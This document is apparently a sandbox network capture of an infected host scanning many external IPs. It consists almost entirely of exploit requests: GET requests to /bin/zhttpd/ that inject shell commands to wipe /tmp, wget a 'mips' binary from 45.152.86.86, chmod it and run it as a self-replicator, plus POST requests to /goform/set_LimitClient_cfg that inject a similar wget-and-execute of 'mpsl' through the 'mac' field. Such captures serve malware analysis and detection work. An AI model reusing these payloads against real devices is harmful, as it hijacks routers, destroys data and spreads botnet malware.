                              Session IDSource IPSource PortDestination IPDestination Port
                              5748192.168.2.133486214.136.105.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987153053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5749192.168.2.1357202102.169.242.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987199068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5750192.168.2.1348474193.224.219.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987255096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5751192.168.2.1333954201.236.10.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987292051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5752192.168.2.1340140145.69.145.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987359047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5753192.168.2.136065445.224.84.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987452030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5754192.168.2.1356404194.189.255.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987466097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5755192.168.2.1350176180.239.75.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987550974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5756192.168.2.13475022.68.118.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987591982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5757192.168.2.1345596138.13.8.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987664938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5758192.168.2.134523872.113.195.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987699986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5759192.168.2.1346672107.177.224.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987751961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5760192.168.2.1335696184.83.5.368080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.114634037 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:40.966167927 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:41.960249901 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:43.960647106 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:47.960309029 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:55.962182045 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination Port
                              5761192.168.2.1356560166.12.111.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992362022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5762192.168.2.1337390145.10.52.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992413044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5763192.168.2.1335366193.124.153.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992455959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5764192.168.2.1353216158.20.129.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992513895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5765192.168.2.134386276.68.55.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992552042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5766192.168.2.134009454.83.58.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992602110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5767192.168.2.1359554102.147.143.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992624044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5768192.168.2.135932079.212.47.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992677927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5769192.168.2.1342916207.61.206.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992701054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5770192.168.2.1332810115.222.193.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992762089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5771192.168.2.133693494.73.124.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992789984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5772192.168.2.1340232183.122.1.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992820978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5773192.168.2.134249096.102.67.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992857933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5774192.168.2.134189024.31.254.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992902040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5775192.168.2.1350686120.155.175.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992935896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5776192.168.2.1345358180.185.74.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.992989063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5777192.168.2.134138644.205.86.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.993012905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5778192.168.2.1340478188.12.25.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.993052959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5779192.168.2.1354434205.84.92.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.993089914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5780192.168.2.134420674.128.30.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.993144989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5781192.168.2.134015870.183.112.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.993192911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5782192.168.2.133289840.1.133.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:38.993231058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5783192.168.2.1342336185.218.82.358080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:39.213457108 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:44.123809099 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:45.121752024 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:47.121560097 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:51.122720003 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:59.122127056 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination Port
                              5784192.168.2.134446479.184.3.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:39.997657061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5785192.168.2.135689212.141.162.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:39.997714996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5786192.168.2.134601057.222.1.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007025003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5787192.168.2.134256866.215.92.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007051945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5788192.168.2.1348912130.123.23.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007093906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5789192.168.2.134071643.164.67.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007162094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5790192.168.2.134589253.197.18.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007214069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5791192.168.2.13395949.71.138.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007282019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5792192.168.2.1341378110.190.160.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007337093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5793192.168.2.133393818.107.8.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007391930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5794192.168.2.135103636.71.172.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007466078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5795192.168.2.1349722168.74.7.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007503986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5796192.168.2.135419046.191.158.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007558107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5797192.168.2.1337986145.109.172.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007591963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5798192.168.2.1341612147.26.98.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007631063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5799192.168.2.133628036.96.84.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007690907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5800192.168.2.135757017.158.248.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007721901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5801192.168.2.1350178167.81.241.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007790089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5802192.168.2.135827682.80.231.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007823944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5803192.168.2.134312619.186.144.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007885933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5804192.168.2.1342042159.44.79.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007922888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5805192.168.2.1343300156.80.144.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007971048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5806192.168.2.134909489.96.191.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.007996082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5807192.168.2.1354452175.191.236.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008048058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5808192.168.2.1335414124.197.187.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008091927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5809192.168.2.1342590165.3.63.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008136988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5810192.168.2.134530873.101.156.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008168936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


